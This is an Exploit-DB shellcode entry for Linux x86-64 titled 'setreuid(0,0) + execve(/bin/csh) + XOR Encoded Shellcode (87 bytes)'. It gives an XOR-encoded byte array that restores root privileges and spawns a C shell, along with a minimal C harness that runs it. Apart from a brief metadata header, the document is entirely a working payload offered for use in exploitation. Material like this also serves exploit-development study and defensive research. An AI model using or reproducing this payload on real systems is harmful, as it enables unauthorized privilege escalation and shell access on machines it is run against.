Linux/x86-64 - setreuid(0,0) + execve(/bin/csh, [/bin/csh, NULL]) + XOR Encoded Shellcode (87 bytes)

2009-01-01T00:00:00
ID EDB-ID:43604
Type exploitdb
Reporter Exploit-DB
Modified 2009-01-01T00:00:00

Description

Linux/x86-64 - setreuid(0,0) + execve(/bin/csh, [/bin/csh, NULL]) + XOR Encoded Shellcode (87 bytes). Shellcode exploit for Linux_x86-64 platform

                                        
                                            # Title: Linux x86-64 setreuid (0,0) & execve("/bin/csh", ["/bin/csh", NULL]) + XOR encoded - 87 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer

unsigned char shellcode[] = 
"\x4d\x31\xc0\x41\xb1\xe3\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\xab\xd2\x23\xab\x60\x23"
"\x92\xab\xd2\x1c\xab\xd2\x15\xec\xe6\x08\xf1\xab\xd2\x23\xab"
"\x60\x23\xd8\xbc\xab\xd2\x31\xb1\xb4\xab\x6a\x05\xec\xe6\x0b"
"\x0a\x1c\x1c\x1c\xcc\x81\x8a\x8d\xcc\x80\x90\x8b";                                     
int main(void) { ((void (*)())shellcode)(); }